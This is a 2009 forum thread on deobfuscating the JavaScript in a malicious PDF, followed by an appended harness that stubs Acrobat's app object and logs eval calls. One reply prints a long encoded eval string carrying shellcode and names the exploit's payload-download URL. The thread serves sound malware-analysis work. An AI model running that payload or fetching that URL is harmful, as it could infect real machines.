Topic: problem analyze malicious pdf file (contain app.)

November 25, 2009, 09:53:31 am

d3t0n4t0r
Hello,

I've stumbled upon a website that hosts a malicious PDF. I've tried decoding the PDF and there is no hassle with that. However, on the JS part, I wasn't able to decode it with the modified SpiderMonkey JS as I got an error regarding the app function. I've tried several methods, such as making my own function that actually runs a print function etc., but with no result.

I would like to ask for favours and pointers on how I can proceed in getting the eval log from SpiderMonkey JS.
The malicious PDF is in the post attachment, with password: infected

Thank you in advance

November 25, 2009, 11:56:49 am
Reply #1

SysAdMini

Using Malzilla:

- replace

Code:
app.rAiDs74Nu6 = viB7XF4GK;
e2comxCBqv = app.setTimeOut("app.rAiDs74Nu6()", 10);

by

Code:
eval(Yyap('ezi#dyt7ZE8dQu#=#Aoz6("*f5656*f5656*f5656*f9UVY*f664Y*f33X0*f19Y0*f1998*fVU66*fV756*fVYUZ*fV194*fUUVX*fUUUU*f1Y2U*fWU5V*fVUVU*f35VU*fV6ZU*f0U35*f57U6*f0U35*f3VV2*fVU96*fVUVY*f35VU*fY096*f3812*fV8Z8*f9296*fVU88*fVUVU*fZZ33*fY0VY*f2212*f3488*f92V8*fVU8U*fVUVU*fZZ33*fY0V2*fXZ12*f894U*f927W*fVU9W*fVUVU*fZZ33*fY0V6*f9912*f9U78*f921U*fVU6Y*fVUVU*fZZ33*fY0UU*f7V12*f9Z03*f9242*fVU70*fVUVU*fZZ33*fZUUY*fW23U*f0Z7X*f3384*fU2ZZ*fV193*fVUVV*fY8VU*f0Z33*f35XY*fVYZZ*fVV14*f35Y3*fU2YZ*f92Y0*fVU35*fVUVU*f12YU*fU4W0*f0UX9*f2192*fVUVU*f33VU*fU6ZZ*f7Z35*f7U3X*f33YU*fXUZZ*f8912*fVUVU*fYUVU*fZZ35*f14UY*fY3VW*fYZ35*f92U2*fVU1V*fVUVU*fZZVX*f71XU*fY6VU*fX808*f711Z*fVYZU*f1Z02*fVUVU*f0Z89*f35XU*fV6ZZ*fVV14*f35Y3*fU2YZ*fZU92*fVUVU*f14VU*fY2V1*fZZVX*fWXXY*fYX65*f89YX*fXU0Z*fYXYU*fZZ35*f14U6*fY3VZ*fYZ35*f92U2*fVUXX*fVUVU*fVU14*f0Z89*f35XU*fV2ZZ*fVW14*f35Y3*fU2YZ*fUU92*fVUVU*f14VU*f3589*fUUZZ*fVV14*f35Y3*fU2YZ*fVU92*fVUVU*fZVVU*fYWY5*f9VVX*f9VVX*f9VVX*f9VVX*f963X*fY4VY*f35YX*f9W64*fYW81*f9U89*f35YZ*f3596*fV207*fY735*fY0V6*f0X35*f35W6*fU80Y*fVX02*fY08X*f0035*fVXXU*fWX8X*fZ373*f57ZV*f7XVX*fWXY0*fV980*fUU48*f8WW4*fV20Y*f787V*fVXV7*fZU8W*f8V95*f88W5*f0ZY8*fY49Z*f9535*fY435*fVXXY*f1067*fV635*f35Z5*fU6Y4*f67VX*fVY35*fVX35*fY87Z*f7WY7*fVUV2*f8Y92*f8988*fYZ89*fZ6YW*fZ9Z7*fVUZ8*f2531*f2925*f7U6Z*f377U*f3U3U*f273Y*f2338*f7V34*f3U36*f7U3W*f3W25*f7U29*f7U2Z*f2134*f297V*f2931*f316U*f346W*f6421")@'));
- run the script and you'll get the shellcode

- the URL in the shellcode is
Code:
bookrave.com/tmp/z/ex.php?h=ex5
http://www.virustotal.com/analisis/caf731d52d1e8e7996f85fc89bd345577479e3a6a20f1a4651bcdaeeb426ed6c-1259119437
Ruining the bad guy's day

November 28, 2009, 06:50:58 pm
Reply #2

d3t0n4t0r
Thanks for the help.
I've gone through the code and found out that I'm just as confused as the code itself.
Really appreciate the help.

Do you have some tips on handling this kind of obfuscation? Or is there no way other than to go through the code and understand every component it does?

November 28, 2009, 08:39:29 pm
Reply #3

SysAdMini

> Or is there no way other than to go through the code and understand every component it does?

Many scripts can only be analyzed by Malzilla/SpiderMonkey if you modify the code.
A completely automated decoding without modifications works only in rare cases.
In order to modify the code you have to understand the logic behind it.
It's not so difficult with some experience. Obfuscation techniques are often similar.
If you have some experience, then you look at the code and quickly get an idea how it works.
It's merely a matter of practice.
Ruining the bad guy's day
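The modification SysAdMini describes in Reply #1 amounts to giving the script the `app` object it expects and then watching what it hands to eval. As an added example (not code from this thread, from Malzilla or from SpiderMonkey), here is a small JavaScript harness that stubs `app.setTimeOut` so scheduled code is logged and run immediately, and wraps the global `eval` so each decoded layer is captured; the sample script is constructed and only reuses the two names from the thread.

```javascript
// Added example, not code from the thread or from Malzilla: a stub of
// Acrobat's `app` object plus a logging eval, so a script that calls
// app.setTimeOut(...) can be run under a plain JS engine and every layer
// it tries to execute is captured. SAMPLE is constructed for this example.

const trace = [];               // everything the sample tried to execute, in order

// Installed on globalThis so code run through (indirect) eval sees it,
// just as a script inside Adobe Reader would.
globalThis.app = {
  viewerVersion: 9,             // constructed value; exploit scripts often probe it
  setTimeOut(code, delay) {
    // Acrobat would run `code` after `delay` ms; for analysis, log it and
    // run it at once so nested layers are unwrapped in a single pass.
    return runLogged(String(code), "app.setTimeOut(" + delay + "ms)");
  },
};

const engineEval = eval;        // real eval, captured before it is replaced below

// Indirect eval: executes `src` in global scope (so the sample's own
// functions and the `app` stub are visible) after recording it.
function runLogged(src, via) {
  trace.push({ via: via || "eval", code: src });
  return engineEval(src);
}

// Run a sample with the global eval replaced by the logging one and return
// the trace; the real eval is always restored afterwards.
function analyse(sample) {
  trace.length = 0;
  const saved = globalThis.eval;
  globalThis.eval = runLogged;
  try {
    runLogged(sample, "script");
  } finally {
    globalThis.eval = saved;
  }
  return trace.slice();
}

// Constructed sample in the shape seen in the thread: stage 1 is scheduled
// through app.setTimeOut, then decodes stage 2 from char codes and evals it.
const SAMPLE = [
  "function viB7XF4GK() {",
  "  var codes = [118,97,114,32,115,116,97,103,101,50,61,34,111,107,34,59];",
  "  eval(String.fromCharCode.apply(null, codes));",
  "}",
  "app.rAiDs74Nu6 = viB7XF4GK;",
  'app.setTimeOut("app.rAiDs74Nu6()", 10);',
].join("\n");

// analyse(SAMPLE) returns three entries; the last is the decoded stage 2:
// { via: "eval", code: 'var stage2="ok";' }
```

Any other Acrobat-only property the sample touches (for example `app.viewerVersion` or the `this.` document object) shows up as an exception with the missing name, which tells you what to add to the stub next.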